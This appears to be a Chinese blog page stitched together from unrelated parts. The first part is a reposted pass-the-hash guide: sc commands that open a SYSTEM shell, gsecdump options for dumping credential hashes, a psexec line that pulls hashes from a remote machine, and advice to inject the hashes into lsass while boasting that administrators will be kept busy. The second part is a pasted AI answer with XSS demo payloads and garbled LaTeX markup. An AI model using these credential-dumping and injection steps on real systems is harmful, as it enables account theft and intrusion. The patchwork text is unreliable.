HASH注入式攻击

文章作者:pt007[at]vip.sina.com

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

下载网址:

http://www.truesec.com/PublicSto ... tectCookieSupport=1



To get a DOS Prompt as NT system:



C:/>sc create shellcmdline binpath= "C:/WINDOWS/system32/cmd.exe /K start" type= own type= interact

[SC] CreateService SUCCESS



C:/>sc start shellcmdline

[SC] StartService FAILED 1053:



The service did not respond to the start or control request in a timely fashion.



C:/>sc delete shellcmdline

[SC] DeleteService SUCCESS



------------



Then in the new DOS window:



Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.



C:/WINDOWS/system32>whoami

NT AUTHORITY/SYSTEM



C:/WINDOWS/system32>gsecdump -h

gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)

usage: gsecdump [options]



options:

-h [ --help ] show help

-a [ --dump_all ] dump all secrets

-l [ --dump_lsa ] dump lsa secrets

-w [ --dump_wireless ] dump microsoft wireless connections

-u [ --dump_usedhashes ] dump hashes from active logon sessions

-s [ --dump_hashes ] dump hashes from SAM/AD



Although I like to use:



PsExec v1.83 - Execute processes remotely

Copyright (C) 2001-2007 Mark Russinovich

Sysinternals - www.sysinternals.com



C:/>psexec //COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT



to get the hashes from active logon sessions of a remote system.



These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.



提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.

原文出处:http://truesecurity.se/blogs/mur ... -text-password.aspx

<think>好的,我现在需要帮助用户了解如何使用XSS Challenge来演示插入式、存储式和DOM型的XSS攻击。首先,我得理清用户的需求,他们可能想通过一个具体的挑战平台展示这三种不同类型的XSS攻击方法。但用户提到的“XSS Challenge”可能指的是某个特定的练习平台,比如类似Google的XSS游戏,或者其他的在线挑战。如果用户指的是一个通用的挑战环境,可能需要先搭建一个本地环境或使用现有的在线平台。 首先,我需要确认用户是否有自己的XSS Challenge环境,或者是否需要推荐一个。假设用户已经有一个目标环境,比如自己搭建的漏洞测试应用,或者是某个在线挑战平台。接下来,我需要分别解释三种攻击类型的具体步骤,提供示例。 插入式(反射型)XSS通常出现在URL参数中,攻击载荷立即反映在响应页面里,不需要存储。例如,在搜索框中注入脚本。存储式XSS则是将恶意脚本保存到服务器,比如评论字段,每次访问页面都会执行。DOM型XSS则是通过修改DOM环境而不经过服务器处理,完全在客户端执行。 然后,我需要考虑如何针对每种类型给出具体的攻击示例。例如,反射型可能通过构造一个带有<script>标签的URL,存储型可能在用户输入的地方提交恶意脚本,而DOM型可能利用如document.write或innerHTML来触发。 同时,必须提醒用户注意法律和道德规范,只能在授权环境下进行测试,避免实际攻击他人系统。此外,建议使用测试用的Payload,比如alert('XSS'),而不是更具破坏性的代码。 可能还需要解释如何搭建一个简单的测试环境,如果用户没有现成的,比如用Node.js和Express创建一个有漏洞的网页应用,包含易受攻击的输入点。例如,一个搜索页面反射输入,一个评论系统存储输入,以及一个通过URL参数修改DOM的页面部分。 在结构上,需要分步骤说明每种攻击的实施方法,可能包括代码示例、测试步骤和预期结果。同时,确保使用正确的中文术语,遵循系统级指令中的LaTeX格式要求,例如变量用$...$包裹,独立公式用$$...$$。 最后,确保回答清晰,逐步引导用户理解每种攻击类型的原理和实现方式,同时强调合法性和道德考虑。</think>以下是分步骤的XSS攻击演示方法(请确保在合法授权环境中操作): 一、环境准备 1. 搭建/使用XSS Challenge测试平台(推荐DVWA/XSS游戏) 2. 开启浏览器开发者工具(F12),用于调试和观察 二、反射型XSS演示 1. 在URL参数注入: ```text http://vulnerable-site.com/search?query=<script>alert('反射型XSS')</script> ``` 2. 观察弹出窗口,说明未过滤输入直接输出 三、存储型XSS演示 1. 寻找用户内容提交点(如评论框): ```html <textarea> <img src=x onerror=alert('存储型XSS')> </textarea> ``` 2. 提交后刷新页面,脚本持续触发 四、DOM型XSS演示 1. 查找客户端脚本处理点: ```javascript // 假设存在漏洞代码 document.write('<div>'+window.location.hash.slice(1)+'</div>'); ``` 2. 构造URL: ```text http://vulnerable-site.com#<img src=x onerror=alert('DOM型XSS')> ``` 五、防御对比演示 1. 服务端过滤前后对比: ```php // 过滤前 echo $_GET['input']; // 过滤后 echo htmlspecialchars($_GET['input'], ENT_QUOTES); ``` 2. 使用$$encodeURIComponent(window.location.hash)$$进行URL编码 注意事项: 1. 始终在授权环境测试 2. 建议使用$\text{alert(1)}$而非危险操作 3. 现代浏览器内置XSS过滤器可能影响演示,需禁用或调整安全级别 扩展学习: 1. CSP策略对比:$$Content-Security-Policy: default-src 'self'$$ 2. 使用$\text{<template>}$标签安全渲染内容 3. 推荐OWASP Cheat Sheet作为防御参考 请根据实际测试环境调整具体Payload,建议配合开发者工具的Console和Network面板进行实时调试分析。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值